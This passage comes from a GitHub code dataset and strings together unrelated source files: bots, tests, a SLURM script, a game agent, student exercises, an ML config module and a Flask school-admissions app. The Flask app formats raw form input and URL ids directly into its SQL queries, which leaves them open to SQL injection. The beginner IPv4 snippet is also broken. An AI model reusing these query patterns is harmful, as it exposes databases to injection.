that server) or something else went wrong with the retrieval\n if stat_list is None:\n await ctx.reply(f'Could not retrieve this server\\'s leaderboard')\n return\n\n # create an embed for the leaderboard\n embed = discord.Embed()\n embed.colour = 16357382\n embed.title = 'Practice Time Leaderboard'\n embed.timestamp = time_utils.now_date()\n embed.set_thumbnail(url='https://cdn.discordapp.com/attachments/693257204819689483/822353418839916544/IMG_1553.jpg')\n\n # this will be to index the top users in each server\n # automatic indexing won't work here because if there is a null user (user document is no longer in the server)\n # leaderboard will error out and not display the embed\n index = 0\n # for each statistic on the leaderboard\n for stats in stat_list:\n # gets the user associated with the current statistic\n user = ctx.guild.get_member(int(stats[\"userId\"]))\n\n # this handles the case where user is no longer in the server\n if user is None:\n # just move on to the next user without incrementing the index\n continue\n\n # dev note: we should probably delete records of users no longer in the server after some time\n\n total_readable = time_utils.time_readable(stats['info']['practiceStats']['totalTime'])\n total_str = f'{total_readable[0]}d {total_readable[1]}h {total_readable[2]}m {total_readable[3]}s'\n\n # if current user is the holder for most practiced in the server (excluding anyone no longer in the server)\n # give them a crown beside their name\n if index == 0:\n embed.add_field(name=f'{index+1}. {user.name}#{user.discriminator} ♕', value=f'Total time practiced: ' + total_str, inline=False)\n else:\n embed.add_field(name=f'{index+1}. {user.name}#{user.discriminator}', value=f'Total time practiced: ' + total_str, inline=False)\n\n # we increment the index here so when above user null case gets hit, index does not get incremented\n index += 1\n\n logging.log(level=logging.INFO, msg=f'Leaderboard requested by {ctx.author.name}#{ctx.author.discriminator}')\n\n await(await ctx.reply(embed=embed)).delete(delay=20)\n return\n\n\ndef setup(client):\n client.add_cog(Stats(client))\n","repo_name":"PradyRao/Shush","sub_path":"Commands/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":7907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12301209847","text":"class intro : \n def __init__(self, name, age, sex):\n self.name=name\n self.age=age\n self.sex=sex\n \n def __str__(self) :\n return \"{}는 {}세이고, {}입니다.\".format(self.name, self.age, self.sex)\n\njj = intro(\"짱구\",5,\"남자\")\ndd = intro(\"도라에몽\",14,\"남자\")\ncc = intro(\"코난\",8,\"남자\")\nss = intro(\"쇼콜라\",15,\"여자\")\naa = intro(\"아무\",12,\"여자\")\ngg = intro(\"가영\",16,\"여자\")\nprint(jj)\nprint(dd)\nprint(cc)\nprint(ss)\nprint(aa)\nprint(gg)","repo_name":"ji3847/python","sub_path":"파이썬과제3_이지현.py","file_name":"파이썬과제3_이지현.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18789538184","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_log import log\nfrom oslo_utils import excutils\n\nfrom dragonflow.tests.common import app_testing_objects\nfrom dragonflow.tests.common import utils as test_utils\nfrom dragonflow.tests.fullstack import test_base\n\nLOG = log.getLogger(__name__)\n\n\nclass TestApps(test_base.DFTestBase):\n def test_infrastructure(self):\n try:\n topology = app_testing_objects.Topology(self.neutron, self.nb_api)\n subnet1 = topology.create_subnet(cidr='192.168.10.0/24')\n subnet2 = topology.create_subnet(cidr='192.168.11.0/24')\n port1 = subnet1.create_port()\n port2 = subnet2.create_port()\n topology.create_router([subnet1.subnet_id, subnet2.subnet_id])\n LOG.info('Port1 name: {}'.format(port1.tap.tap.name))\n LOG.info('Port2 name: {}'.format(port2.tap.tap.name))\n test_utils.print_command(['ip', 'addr'])\n test_utils.print_command(['ovs-vsctl', 'show'], True)\n test_utils.print_command(\n ['ovs-ofctl', 'show', self.integration_bridge],\n True\n )\n test_utils.print_command(\n ['ovs-ofctl', 'dump-flows', self.integration_bridge],\n True\n )\n test_utils.print_command(\n ['ovsdb-client', 'dump', 'Open_vSwitch'],\n True\n )\n except Exception:\n with excutils.save_and_reraise_exception():\n try:\n topology.close()\n except Exception:\n pass # Ignore\n topology.close()\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/tests/fullstack/test_apps.py","file_name":"test_apps.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"69916517905","text":"import os\nimport time\n\nsbatch_f = \"/scratch/bingo/joao.barretos/hide_and_seek/sbatches/simple_test/sbatch_simple_test.srm\"\nn_simple_teste = \"/scratch/bingo/joao.barretos/hide_and_seek/sbatches/simple_test/simple_test{}.srm\"\nsqueue = \"squeue -u joao.barretos -p cpu_dev\"\nsleep_time = 5\nn_testes = 2\nmax_queue = 1\n\nfor n_teste in range(n_testes): \n os.system(\"cp {} {}\".format(sbatch_f, n_simple_teste.format(n_teste)))\n \nfor n_teste in range(n_testes):\n in_queue = len(os.popen(squeue).read().split(\"\\n\"))-2\n print(\"{} jobs in queue\".format(in_queue))\n while in_queue>=max_queue:\n print(\"Waiting for space in queue...\")\n time.sleep(sleep_time)\n in_queue = len(os.popen(squeue).read().split(\"\\n\"))-2\n print(\"Executing sbatch {}\".format(n_teste))\n os.system(\"sbatch {}\".format(n_simple_teste.format(n_teste)))\n","repo_name":"joaoalbert/sbatches","sub_path":"simple_test/simple_requeue.py","file_name":"simple_requeue.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23014215395","text":"from game_utils import *\n\nowner_unit_id = \"unit_id\"\n\nendgame_fire_start_danger = 3.0\nendgame_fire_end_danger = 0.0 # danger of the endgame fire in the center\nendgame_fire_base_multiplier = 0.1\nendgame_fire_else = 40\nendgame_fire_endgame_multiplier_per_fire = 0.02\nendgame_fire_center_discount_mass = -0.2\nendgame_fire_center_discount = -0.2 # gets multiplied by HP.\n\nmy_bomb_starting_danger = 5\nenemy_bomb_starting_danger = 140\nbomb_end_danger_ticks = 5\nunarmed_bomb_danger_modifier = 0.9\nbomb_end_danger_max = 150\n\nclose_cell_danger = 0.1\n\nbomb_arming_ticks = 5\npower_up_discount = -0.5\nclose_enemy_discount = -0.2\nclose_to_center_enemy_discount = -3\ncenter_occupied_ammo_discount = -3\nexplosion_danger = 100000\nstand_on_bomb_danger = 999\n\nsearch_budget_big = 50\nsearch_budget_small = 25\nsearch_horizon = 30\n\n\nclass Parser:\n\n def __init__(self, tick_number, game_state,\n calculate_wall_map=False, pov_agent_id=None):\n w = game_state.get(\"world\").get(\"width\")\n h = game_state.get(\"world\").get(\"height\")\n self.w = w\n self.h = h\n self.center = Point(w // 2, h // 2)\n self.walkable_map = np.zeros((w, h))\n self.cell_occupation_danger_map = np.zeros((w, h))\n self.my_bomb_explosion_map_objects = [[None for i in range(h)] for j in range(w)]\n self.all_bomb_explosion_map = np.zeros((w, h), dtype=object)\n self.danger_map = np.zeros((w, h))\n self.power_ups = []\n self.bombs = []\n self.my_bombs = []\n self.my_armed_bombs = []\n self.enemy_bombs = []\n self.endgame_fires = 0\n self.my_units = []\n self.my_unit_ids = []\n self.enemy_units = []\n self.enemy_unit_ids = []\n self.unit_id_to_unit = dict()\n self.cluster_to_bombs = dict()\n\n if calculate_wall_map:\n self.wall_map = np.zeros_like(self.walkable_map)\n\n # ====== process units =====\n\n units = game_state.get(\"unit_state\")\n self.units = units\n\n if pov_agent_id is None:\n my_agent_id = game_state.get(\"connection\").get(\"agent_id\")\n else:\n my_agent_id = pov_agent_id\n my_units = game_state.get(\"agents\").get(my_agent_id).get(\"unit_ids\")\n for unit_id in my_units:\n self.parse_unit(unit_id, self.my_units, self.my_unit_ids)\n for agent_id in game_state.get(\"agents\"):\n if agent_id == my_agent_id:\n continue\n enemy_units = game_state.get(\"agents\").get(agent_id).get(\"unit_ids\")\n for unit_id in enemy_units:\n self.parse_unit(unit_id, self.enemy_units, self.enemy_unit_ids)\n for unit in self.enemy_units:\n self.walkable_map[unit.pos] = math.inf\n self.my_units.sort(key=lambda u: u.hp, reverse=True)\n # ====== process entities =====\n\n entities = game_state.get(\"entities\")\n self.entities = entities\n\n # a: ammunition\n # b: Bomb\n # x: Blast\n # bp: Blast Powerup\n # m: Metal Block\n # o: Ore Block\n # w: Wooden Block\n for entity in entities:\n e_type = entity.get(\"type\")\n if e_type == \"a\" or e_type == \"bp\":\n self.power_ups.append(entity)\n continue\n coordinates = entity.get(\"x\"), entity.get(\"y\")\n if e_type != \"x\":\n self.walkable_map[coordinates] = math.inf\n draw_cross(self.cell_occupation_danger_map, coordinates[0], coordinates[1], rad=2,\n value=close_cell_danger)\n if e_type == \"b\":\n bomb_placed_tick = entity.get(\"created\")\n bomb_will_explode_tick = entity.get(\"expires\")\n is_armed = tick_number - bomb_placed_tick > bomb_arming_ticks\n\n bomb = Bomb(\n Point(*coordinates),\n entity.get(\"blast_diameter\"),\n entity.get(owner_unit_id),\n is_armed\n )\n self.bombs.append(bomb)\n\n is_my_bomb = bomb.owner_unit_id in my_units\n\n base_danger = my_bomb_starting_danger if is_my_bomb else enemy_bomb_starting_danger\n\n if not is_armed:\n base_danger *= unarmed_bomb_danger_modifier\n\n end_danger = 0\n if tick_number >= bomb_will_explode_tick - bomb_end_danger_ticks:\n end_danger = bomb_end_danger_max * (1 - (bomb_will_explode_tick - tick_number - 1) /\n bomb_end_danger_ticks)\n bomb_danger = base_danger + end_danger\n\n cluster = BombCluster(\n bomb.pos,\n bomb_danger,\n is_armed,\n is_my=is_my_bomb,\n is_enemy=not is_my_bomb,\n ticks_till_explode=bomb_will_explode_tick - tick_number,\n my_bomb_that_can_trigger=bomb if is_my_bomb and is_armed else None\n )\n map_entry = BombExplosionMapEntry(bomb, cluster)\n self.all_bomb_explosion_map[bomb.pos] = map_entry\n self.cluster_to_bombs[cluster] = [map_entry]\n\n if is_my_bomb:\n self.my_bombs.append(bomb)\n if is_armed:\n self.my_armed_bombs.append(bomb)\n else:\n self.enemy_bombs.append(bomb)\n if e_type == \"x\":\n if \"expires\" not in entity:\n self.endgame_fires += 1\n self.danger_map[coordinates] = explosion_danger\n if calculate_wall_map:\n if e_type == \"m\":\n self.wall_map[coordinates] = math.inf\n if e_type == \"w\" or e_type == \"o\":\n self.wall_map[coordinates] = entity.get(\"hp\")\n self.process_bombs()\n for x, y in np.ndindex(self.all_bomb_explosion_map.shape):\n map_entry = self.all_bomb_explosion_map[x, y]\n if map_entry:\n self.danger_map[x, y] += map_entry.cluster.danger\n\n def process_bombs(self):\n arr = self.all_bomb_explosion_map\n for bomb in self.bombs:\n x, y = bomb.pos\n rad = blast_r(bomb.blast_diameter)\n entry = self.all_bomb_explosion_map[bomb.pos]\n for i in range(1, rad):\n if x + i < arr.shape[0]:\n other = arr[x + i, y]\n if other:\n self.merge(entry, other)\n break\n arr[x + i, y] = entry\n for i in range(1, rad):\n if x - i >= 0:\n other = arr[x - i, y]\n if other:\n self.merge(entry, other)\n break\n arr[x - i, y] = entry\n for i in range(1, rad):\n if y + i < arr.shape[1]:\n other = arr[x, y + i]\n if other:\n self.merge(entry, other)\n break\n arr[x, y + i] = entry\n for i in range(1, rad):\n if y - i >= 0:\n other = arr[x, y - i]\n if other:\n self.merge(entry, other)\n break\n arr[x, y - i] = entry\n\n def merge(self, bomb_map_entry: BombExplosionMapEntry, other: BombExplosionMapEntry):\n other_cluster = other.cluster\n my_cluster = bomb_map_entry.cluster\n new_cluster = bomb_map_entry.cluster.merge_with(other.cluster)\n new_cluster_entries = []\n for other_cluster_entry in self.cluster_to_bombs[other_cluster]:\n other_cluster_entry.cluster = new_cluster\n new_cluster_entries.append(other_cluster_entry)\n for cluster_entry in self.cluster_to_bombs[my_cluster]:\n cluster_entry.cluster = new_cluster\n new_cluster_entries.append(cluster_entry)\n self.cluster_to_bombs[other_cluster].clear()\n self.cluster_to_bombs[my_cluster].clear()\n self.cluster_to_bombs[new_cluster] = new_cluster_entries\n\n def parse_unit(self, unit_id, target_list, target_ids_list):\n unit = self.units.get(unit_id)\n pos = point(unit)\n if unit.get(\"hp\") <= 0:\n self.walkable_map[pos.x, pos.y] = math.inf\n draw_cross(self.cell_occupation_danger_map, pos.x, pos.y, rad=2, value=close_cell_danger)\n else:\n target_ids_list.append(unit_id)\n res = Unit(\n unit_id,\n pos,\n unit.get(\"inventory\").get(\"bombs\"),\n unit.get(\"hp\"),\n unit.get(\"blast_diameter\"),\n unit.get(\"invulnerability\")\n )\n target_list.append(res)\n self.unit_id_to_unit[unit_id] = res\n\n def check_free(self, p, rad) -> bool:\n \"\"\"\n :return: True if cross has at least one direction free\n \"\"\"\n x, y = p\n arr = self.cell_occupation_danger_map\n free = True\n for i in range(rad):\n if x + i < arr.shape[0] and arr[x + i, y] >= close_cell_danger * 3:\n free = False\n break\n if free:\n return True\n free = True\n for i in range(rad):\n if x - i >= 0 and arr[x - i, y] >= close_cell_danger * 3:\n free = False\n break\n if free:\n return True\n free = True\n for i in range(rad):\n if y + i < arr.shape[1] and arr[x, y + i] >= close_cell_danger * 3:\n free = False\n break\n if free:\n return True\n for i in range(rad):\n if y - i >= 0 and arr[x, y - i] >= close_cell_danger * 3:\n return False\n\n\ndef draw_bomb_explosion_with_obj(arr, obj_arr, bomb, value=1.):\n x, y = bomb.pos\n arr[x, y] = 1\n obj_arr[x][y] = bomb\n for i in range(blast_r(bomb.blast_diameter)):\n if x + i < arr.shape[0]:\n arr[x + i, y] += value\n obj_arr[x + i][y] = bomb\n if x - i >= 0:\n arr[x - i, y] += value\n obj_arr[x - i][y] = bomb\n if y + i < arr.shape[1]:\n arr[x, y + i] += value\n obj_arr[x][y + i] = bomb\n if y - i >= 0:\n arr[x, y - i] += value\n obj_arr[x][y - i] = bomb\n\n\ndef draw_bomb_explosion(arr, bomb, rad=None, value=1.):\n x, y = bomb.get(\"x\"), bomb.get(\"y\")\n if rad is None:\n rad = blast_r(bomb.get(\"blast_diameter\"))\n draw_cross(arr, x, y, rad, value)\n\n\ndef draw_cross(arr, x, y, rad, value):\n for i in range(rad):\n if x + i < arr.shape[0]:\n arr[x + i, y] += value\n if x - i >= 0:\n arr[x - i, y] += value\n if y + i < arr.shape[1]:\n arr[x, y + i] += value\n if y - i >= 0:\n arr[x, y - i] += value\n\n\ndef draw_cross_assign(arr, x, y, rad, value):\n for i in range(rad):\n if x + i < arr.shape[0]:\n arr[x + i, y] = value\n if x - i >= 0:\n arr[x - i, y] = value\n if y + i < arr.shape[1]:\n arr[x, y + i] = value\n if y - i >= 0:\n arr[x, y - i] = value\n","repo_name":"ktolnos/Bomnerman-2022-agent","sub_path":"python3/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":11379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31922042865","text":"class IPv4:\n\tdef __init__(self,x,m):\n\t\tself.x=x\n\t\tself.m=m\n\tdef getNetwork(self):\n\t\tnetwork=[]\n\t\tif self.x&m==1:\n\t\t\tnetwork=[self.x]\n\t\telse:\n\t\t\tnetwork.append(0)\n\t\treturn network\n\nipv4=IPv4([10,0,1,7],24)\nnet=ipv4.getNetwork()\nprint(net)\n","repo_name":"gyanshah/classes","sub_path":"Lab7/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6897890156","text":"# Functions\ndef yes_no(question_text):\n while True:\n\n # Ask user if they can speak Maori days of the week\n answer = input(question_text).lower()\n\n # If yes print \"This program is useless to you\"\n if answer == \"Y\" or answer == \"y\":\n answer = \"Yes\"\n return answer\n\n # If no print \"This program will help you learn Maori\n if answer == \"N\" or answer == \"n\":\n answer = \"No\"\n return answer\n\n # Otherwise - show error\n else:\n print(\"Answer with Y or N\")\n\n\n# main route\nFluency_Checker = yes_no(\"Do you know the Maori names for days of the week? \")\nif Fluency_Checker == \"Yes\":\n print(\"This program will help you learn the Maori days of the week\")\n\nif Fluency_Checker == \"No\":\n print(\"This program wouldn't help you\")\n","repo_name":"Aidan7474/T2_Assesment","sub_path":"Fluency_Checker V3.py","file_name":"Fluency_Checker V3.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1449157968","text":"import math\nfrom itertools import combinations\n\ndef read_dataset(filename):\n\tlines = open(filename).readlines()\n\titems = lines[0].split(',')\n\tdata = []\n\tfor line in lines[1:]:\n\t\tdata.append(list(map(int, line.split(','))))\n\treturn { 'items': items, 'data': data }\n\ndef get_freq(data, items, combination):\n\tfreq = 0\n\tfor row in data:\n\t\ttemp = 1\n\t\tfor i in combination:\n\t\t\ttemp *= row[items.index(i)]\n\t\tif temp >= 1:\n\t\t\tfreq += 1\n\treturn freq\n\ndef get_itemsets(data, items, level):\n\tsets = set(combinations(items, level))\n\titem_sets = []\n\tfor s in sets:\n\t\tif(get_freq(data, items, s) >= min_freq):\n\t\t\titem_sets.append(s)\n\treturn item_sets\n\ndataset = read_dataset('market.csv')\nmin_support = 40\nmin_freq = math.ceil((min_support/100.0)*len(dataset['data']))\n\nfor l in range(2, len(dataset['items']) + 1):\n\titemset = get_itemsets(dataset['data'], dataset['items'], l)\n\tif(len(itemset) == 0):\n\t\tbreak\n\tprint(\"Level: \" + str(l) + \": \\n\" + str(itemset) + \"\\n\\n\")","repo_name":"virajvchavan/Data-Mining","sub_path":"frequent_item_set/method2/frequent_itemsets.py","file_name":"frequent_itemsets.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43970493685","text":"\"\"\"\nThis file contains both the Category and EmbeddingConfig classes, which are responsible to store data related to the\ncategories. This data will be later on used on our EmbeddingNetwork class.\n\"\"\"\nfrom typing import List\n\nimport numpy as np\n\nfrom entity_embeddings.network.assembler import get_model_assembler\nfrom entity_embeddings.processor.target_type import TargetType\nfrom entity_embeddings.util.dataframe_utils import load_guarantee_not_empty\nfrom entity_embeddings.util.processor_utils import get_target_processor\nfrom entity_embeddings.util.validation_utils import *\n\n\ndef get_embedding_size(unique_values: int) -> int:\n \"\"\"\n Return the embedding size to be used on the Embedding layer\n :param unique_values: the number of unique values in the given category\n :return: the size to be used on the embedding layer\n \"\"\"\n size = int(min(np.ceil(unique_values / 2), 50))\n if size < 2:\n return 2\n else:\n return size\n\n\ndef generate_categories_from_df(df: pd.DataFrame, target_name: str) -> List:\n \"\"\"\n Returns a list of the categories from a given pandas DataFrame, with the exception of the provided target name\n :param df: the DataFrame\n :param target_name: the name of the target column to not be included\n :return: a List of Category with the df columns except the provided one\n \"\"\"\n category_list = []\n\n for category in df:\n if not category == target_name:\n category_list.append(Category(category, df[category].nunique()))\n\n return category_list\n\n\nclass Category:\n \"\"\"\n Used to store fields related to a given category, such as its name, count of unique values and the size of each\n embedding layer\n \"\"\"\n\n def __init__(self, alias: str, unique_values: int):\n self.alias = alias\n self.unique_values = unique_values\n self.embedding_size = get_embedding_size(unique_values)\n\n\nclass Config:\n \"\"\"\n Used to store all the configuration (dataframes, target type, epochs, artifacts..) which will be\n used on our Embeddings Network\n \"\"\"\n\n def __init__(self,\n csv_path: str,\n target_name: str,\n train_ratio: float,\n target_processor: TargetProcessor,\n model_assembler: ModelAssembler,\n epochs: int = 10,\n batch_size: int = 128,\n verbose: bool = False,\n artifacts_path: str = 'artifacts'):\n # input validations\n check_csv_data(csv_path)\n check_target_name(target_name)\n check_train_ratio(train_ratio)\n check_epochs(epochs)\n check_batch_size(batch_size)\n\n check_target_processor(target_processor)\n check_model_assembler(model_assembler)\n\n self.csv_path = csv_path\n self.target_name = target_name\n self.train_ratio = train_ratio\n self.epochs = epochs\n self.batch_size = batch_size\n self.verbose = verbose\n self.artifacts_path = artifacts_path\n\n self.target_processor = target_processor\n self.model_assembler = model_assembler\n\n self.df = load_guarantee_not_empty(self.csv_path)\n check_target_existent_in_df(self.target_name, self.df)\n\n self.unique_classes = self.df[self.target_name].nunique()\n\n self.categories: List[Category] = generate_categories_from_df(self.df, self.target_name)\n\n # artifacts related fields\n self.DEFAULT_WEIGHTS_FILENAME = 'weights.pickle'\n self.DEFAULT_LABELS_FILENAME = 'labels.pickle'\n self.DEFAULT_PATH_VISUALIZATIONS = 'visualizations'\n\n @classmethod\n def make_default_config(cls,\n csv_path: str,\n target_name: str,\n target_type: TargetType,\n train_ratio: float,\n epochs: int = 10,\n batch_size: int = 128,\n verbose: bool = False,\n artifacts_path: str = 'artifacts'):\n \"\"\"\n Used to create a default Config object.\n\n :param csv_path: where the csv containing both the features and target is located\n :param target_name: the name of the target/output variable\n :param target_type: the TargetType to be used (BINARY, REGRESSION, MULTICLASS)\n :param train_ratio: the proportion to be used for the training subset\n :param epochs: how many epochs should the model be trained\n :param batch_size: the size of the batch size\n :param verbose: if logs should be outputted or not\n :param artifacts_path: where the artifacts (weights, labels, visualizations) should be stored\n :return: a Config object\n \"\"\"\n df = load_guarantee_not_empty(csv_path)\n check_target_existent_in_df(target_name, df)\n n_unique_classes = df[target_name].nunique()\n\n target_processor = get_target_processor(target_type)\n model_assembler = get_model_assembler(target_type, n_unique_classes)\n\n return cls(csv_path,\n target_name,\n train_ratio,\n target_processor,\n model_assembler,\n epochs,\n batch_size,\n verbose,\n artifacts_path)\n\n @classmethod\n def make_custom_config(cls,\n csv_path: str,\n target_name: str,\n train_ratio: float,\n target_processor: TargetProcessor,\n model_assembler: ModelAssembler,\n epochs: int = 10,\n batch_size: int = 128,\n verbose: bool = False,\n artifacts_path: str = 'artifacts'):\n \"\"\"\n Used to create a custom Config object. Mostly should be used when you want to have a custom TargetProcessor\n and/or a custom ModelAssembler.\n\n :param csv_path: where the csv containing both the features and target is located\n :param target_name: the name of the target/output variable\n :param train_ratio: the proportion to be used for the training subset\n :param target_processor: the TargetProcessor to be used\n :param model_assembler: the ModelAssembler to be used\n :param epochs: how many epochs should the model be trained\n :param batch_size: the size of the batch size\n :param verbose: if logs should be outputted or not\n :param artifacts_path: where the artifacts (weights, labels, visualizations) should be stored\n :return: a Config object\n \"\"\"\n return cls(csv_path,\n target_name,\n train_ratio,\n target_processor,\n model_assembler,\n epochs,\n batch_size,\n verbose,\n artifacts_path)\n\n def get_weights_path(self):\n \"\"\"\n Used to return the path of the stored weights\n :return: the pah of the stored weights on disk\n \"\"\"\n return os.path.join(self.artifacts_path, self.DEFAULT_WEIGHTS_FILENAME)\n\n def get_labels_path(self):\n \"\"\"\n Used to return the path of the stored labels\n :return: the pah of the stored labels on disk\n \"\"\"\n return os.path.join(self.artifacts_path, self.DEFAULT_LABELS_FILENAME)\n\n def get_visualizations_dir(self):\n \"\"\"\n Used to return the path of the stored visualizations\n :return: the pah of the stored visualizations on disk\n \"\"\"\n return os.path.join(self.artifacts_path, self.DEFAULT_PATH_VISUALIZATIONS)\n","repo_name":"rodrigobressan/entity_embeddings_categorical","sub_path":"entity_embeddings/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7772,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"48"} +{"seq_id":"32831744311","text":"from django import forms\n\nSubtopic_Choices = (\n (\"finance\",\"finance\"),\n (\"option2\",\"option2\"),\n (\"option3\",\"option3\"),\n\n)\n\nPrivacy_Choices = (\n ('yes','yes'),\n ('no','no'),\n\n)\n\nclass NLPQueryForm(forms.Form):\n question = forms.CharField()\n document = forms.FileField()\n subtopic = forms.ChoiceField(choices = Subtopic_Choices)\n privacy = forms.ChoiceField(choices = Privacy_Choices, widget=forms.RadioSelect)\n\n ","repo_name":"TNBL265/NLPQueryBot","sub_path":"NLPQueryApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14944871819","text":"from flask import Flask, render_template, session, redirect, request, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import text\nimport bcrypt\nimport os\n\napp = Flask(__name__)\n\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\n#decorator for unauthorized access\ndef authorize(func):\n def wrapper(*args, **kwargs):\n try:\n session['name'] != None\n except:\n flash(\"Vaše relace vypršela. Prosím přihlašte se.\", \"error\")\n return redirect(url_for('login'))\n else:\n return func(*args, **kwargs)\n wrapper.__name__ = func.__name__\n return wrapper\n\n@app.route(\"/\")\ndef index():\n fields = db.engine.execute('SELECT * FROM obor')\n cities = db.engine.execute('SELECT * FROM mesto')\n years = db.engine.execute('SELECT DISTINCT rok FROM pocet_prijatych')\n query = db.engine.execute('SELECT skola.id, skola.nazev, mesto.nazev, obor.nazev, pocet_prijatych.pocet, pocet_prijatych.rok FROM mesto JOIN skola ON mesto.id=skola.mesto JOIN pocet_prijatych ON skola.id=pocet_prijatych.skola JOIN obor ON pocet_prijatych.obor=obor.id')\n result = []\n for row in query:\n result.append(row)\n return render_template(\"index.html\", data=result, cities=cities, fields=fields, years=years)\n\n@app.route('/addSchool', methods=[\"GET\",\"POST\"])\n@authorize\ndef addSchool():\n if request.method == 'GET':\n fields = db.engine.execute('SELECT * FROM obor')\n cities = db.engine.execute('SELECT * FROM mesto')\n return render_template('add_school.html', fields=fields, cities=cities)\n else:\n school = request.form['school']\n geoLat = request.form['geoLat']\n geoLong = request.form['geoLong']\n city = request.form['city']\n field = request.form['field']\n num_of_accepted = request.form['num_of_accepted']\n year = request.form['year']\n try:\n db.engine.execute(\"INSERT INTO skola (nazev, mesto, geo_lat, geo_long) VALUES ('%s', %s, %s, %s)\" % (school, city, geoLat, geoLong))\n insertedSchoolId = db.engine.execute(\"SELECT id FROM skola WHERE nazev='%s'\" % (school)).first()\n db.engine.execute(\"INSERT INTO pocet_prijatych (obor, skola, pocet, rok) VALUES ('%s', %s, %s, %s)\" % (field, insertedSchoolId[0], num_of_accepted, year))\n\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n return redirect(url_for(\"index\"))\n except Exception as e:\n print(e)\n flash(\"Při ukládání se vyskytla chyba.\", \"error\")\n return redirect(url_for(\"index\"))\n \n@app.route('/addCity', methods=[\"GET\",\"POST\"])\n@authorize\ndef addCity():\n if request.method == 'GET':\n return render_template('add_city.html')\n else:\n name = request.form['name']\n try:\n db.engine.execute(\"INSERT INTO mesto (nazev) VALUES ('%s')\" % (name))\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n except Exception as e:\n flash(\"Při ukládání se vyskytl problém.\" + str(e), \"error\")\n return redirect(url_for(\"index\"))\n \n\n@app.route('/addField', methods=[\"GET\",\"POST\"])\n@authorize\ndef addField():\n if request.method == 'GET':\n return render_template('add_field.html')\n else:\n name = request.form['name']\n try:\n db.engine.execute(\"INSERT INTO obor (nazev) VALUES ('%s')\" % (name))\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n except:\n flash(\"Při ukládání se vyskytl problém.\", \"error\")\n return redirect(url_for(\"index\"))\n\n#route for editing school\n@app.route('/editSchool/', methods=[\"GET\",\"POST\"])\n@authorize\ndef editSchool(id):\n if request.method == 'GET':\n school = db.engine.execute(\"SELECT * FROM skola WHERE id=%s\" % (id)).first()\n fields = db.engine.execute('SELECT * FROM obor')\n cities = db.engine.execute('SELECT * FROM mesto')\n school_join = db.engine.execute('SELECT skola.id, skola.nazev, mesto.nazev, obor.id, obor.nazev, pocet_prijatych.pocet, pocet_prijatych.rok, mesto.id FROM mesto JOIN skola ON mesto.id=skola.mesto JOIN pocet_prijatych ON skola.id=pocet_prijatych.skola JOIN obor ON pocet_prijatych.obor=obor.id WHERE skola.id=%s' % (id)).first()\n print(school_join)\n return render_template('edit_school.html', school=school, school_join=school_join, fields=fields, cities=cities)\n else:\n school_join = db.engine.execute('SELECT obor.id FROM mesto JOIN skola ON mesto.id=skola.mesto JOIN pocet_prijatych ON skola.id=pocet_prijatych.skola JOIN obor ON pocet_prijatych.obor=obor.id WHERE skola.id=%s' % (id)).first()\n school = request.form['school']\n geoLat = request.form['geoLat']\n geoLong = request.form['geoLong']\n city = request.form['city']\n field = request.form['field']\n num_of_accepted = request.form['num_of_accepted']\n year = request.form['year']\n try:\n db.engine.execute(\"UPDATE skola SET nazev='%s', mesto=%s, geo_lat=%s, geo_long=%s WHERE id=%s\" % (school, city, geoLat, geoLong, id))\n db.engine.execute(\"UPDATE pocet_prijatych SET obor=%s, pocet=%s, rok=%s WHERE skola=%s AND obor=%s\" % (field, num_of_accepted, year, id, school_join[0]))\n print(\"UPDATE pocet_prijatych SET obor=%s, pocet=%s, rok=%s WHERE skola=%s AND obor=%s\" % (field, num_of_accepted, year, id, school_join[0]))\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n return redirect(url_for(\"index\"))\n except Exception as e:\n flash(\"Při ukládání se vyskytl problém.\" + str(e), \"error\")\n return redirect(url_for(\"index\"))\n\n#route for deleting school\n@app.route('/deleteSchool/', methods=[\"GET\"])\n@authorize\ndef deleteSchool(id):\n try:\n db.engine.execute(\"DELETE FROM skola WHERE id=%s\" % (id))\n flash(\"Smazání proběhlo úspěšně.\", \"success\")\n return redirect(url_for(\"index\"))\n except Exception as e:\n flash(\"Při mazání se vyskytl problém.\" + str(e), \"error\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/map\")\n@authorize\ndef map():\n query = db.engine.execute('SELECT * FROM 